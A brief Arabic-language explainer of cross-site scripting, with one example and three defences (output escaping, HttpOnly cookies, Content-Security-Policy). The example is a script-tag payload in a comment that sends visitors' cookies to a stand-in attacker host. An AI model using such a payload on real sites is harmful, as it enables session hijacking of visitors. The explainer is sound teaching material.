XSS (Cross-Site Scripting) هجوم يحقن كودًا ضارًا، عادةً JavaScript، في صفحة موقع، فيُنفَّذ في متصفحات الزوار.
كيف يحدث؟
موقع يعرض التعليقات كما هي. يكتب المهاجم تعليقًا:
<script>fetch('https://evil.example/?c=' + document.cookie)</script>
كل من يفتح الصفحة يُنفَّذ عنده الكود، وقد تُسرق جلسته.
الحماية
- تهريب المخرجات قبل عرضها، فتظهر كنص لا ككود:
echo htmlspecialchars($comment); // PHP
echo esc_html($comment); // WordPress
- كوكيز الجلسة بخاصية
HttpOnly، فلا تستطيع JavaScript قراءتها. - سياسة أمان المحتوى (Content-Security-Policy).